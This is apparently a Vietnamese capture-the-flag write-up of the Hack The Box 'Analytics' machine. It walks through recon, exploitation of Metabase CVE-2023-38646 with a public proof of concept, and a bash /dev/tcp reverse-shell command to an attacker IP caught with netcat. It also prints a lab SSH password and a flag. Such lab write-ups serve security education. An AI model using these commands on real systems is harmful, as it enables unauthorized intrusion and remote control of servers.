Giới thiệu
Tưởng chừng như việc nâng cấp code sẽ mang lại cho ứng dụng web thêm tiện ích hay bảo mật. Nhưng không đối với Request-Baskets khi mà trong khi nâng cấp code anh dev đã xoá đi 1 dòng code quan trọng, dẫn đến việc hệ thống bị RCE.
1. Recon
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV 10.10.11.233
[sudo] password for kali: Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-18 22:06 EST
Nmap scan report for 10.10.11.233
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: | 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://analytical.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.47 seconds
Thêm dòng sau vào file /etc/hosts
10.10.11.233 analytical.htb
Truy cập vào trang web
Ở đây có 1 subdomain khi truy cập vào login là: data.analytical.htb
Chỉnh sửa file /etc/hosts
10.10.11.233 data.analytical.htb
Tiếp tục truy cập
Metabase là một công cụ thông minh kinh doanh nguồn mở cho phép bạn tạo biểu đồ và trang tổng quan bằng cách sử dụng dữ liệu từ nhiều cơ sở dữ liệu và nguồn dữ liệu khác nhau
2.Enum
Thực hiện directory scan đối với analytical.htb
và data.analytical.htb
┌──(kali㉿kali)-[~]
└─$ ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://analytical.htb/FUZZ /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.5.0 Kali Exclusive <3
________________________________________________ :: Method : GET :: URL : http://analytical.htb/FUZZ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________ [Status: 200, Size: 17169, Words: 4391, Lines: 365, Duration: 106ms]
images [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 401ms]
css [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 117ms]
js [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 92ms]
Không có gì đặc biệt cả
3. Exploit
Khi truy cập vào subdomain: data.analytical.htb
Kiểm tra trên burpsuite, thì data.analytical.htb
nó sẽ gọi đến /api/session/properties
Trên /api/session/properties
có lộ 1 setup-token mà chúng ta không cần phải đăng nhập cũng có thể đọc được
Dưới đây là quá trình setup Metabase
Nhưng khi mà trong 1 lần có thể là nâng cấp code của ứng dụng, dev đã xoá đi phần quan trọng nhất là (setup/clear-token!)
Đây là bản code trước khi nâng cấp
Còn đây là sau khi nâng cấp:
Cái dòng setup/clear-token!
hoàn toàn bị xoá đi. Các bạn có thể xem phần so sánh ở đây
Như vậy luồng hoạt động của nó sau khi sửa code sẽ là như sau:
Bước xoá setup-token đã bị bỏ đi
Sau khi research ứng dụng Metabase này dính 1 CVE-2023-38646, để tóm tắt nó sẽ được thực hiện như sau:
- Có được setup-token ở trên
/api/session/properties
như ta đã giải thích ở trên - Biết được 1 API có sử dụng token trên để xác thực kết nối DB
- Biết được 1 lỗ hổng SQL Injection tồn tại trên H2 db driver
- Ta có thể RCE thông qua lỗ hổng SQL Injection
Thực hiện tìm kiếm mã khai thác:
https://github.com/m3m0o/metabase-pre-auth-rce-poc/blob/main/main.py
Chạy mã khai thác:
┌──(kali㉿kali)-[~]
└─$ python3 cveMetaBase.py -u http://data.analytical.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c "/bin/bash -i >& /dev/tcp/10.10.16.10/8888 0>&1"
[!] BE SURE TO BE LISTENING ON THE PORT YOU DEFINED IF YOU ARE ISSUING AN COMMAND TO GET REVERSE SHELL [!] [+] Initialized script
[+] Encoding command
[+] Making request
[+] Payload sent
Lắng nghe và truy cập được vào
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 8888 listening on [any] 8888 ...
connect to [10.10.16.10] from (UNKNOWN) [10.10.11.233] 40850
bash: cannot set terminal process group (1): Not a tty
bash: no job control in this shell
3051021b417f:/$ whoami
whoami
metabase
3051021b417f:/$
Nhưng không có ở flag ở trong thư mục home
Tìm kiếm trên file /etc/proc/environ có thông tin đăng nhập ssh của người dùng metalytics
với mật khẩu là An4lytics_ds20223#
, truy cập và có được flag user
metalytics@analytics:~$ ls
1 l m u user.txt w
metalytics@analytics:~$ cat user.txt b4ef54038d9d7971c025c51b76be2cc8
metalytics@analytics:~$
4. Recomendation
- Thực hiện nâng cấp metabase lên phiên bản mới nhất
5. Referrence
[1]. Giải thích về rce metabase https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
[2]. Poc: https://github.com/m3m0o/metabase-pre-auth-rce-poc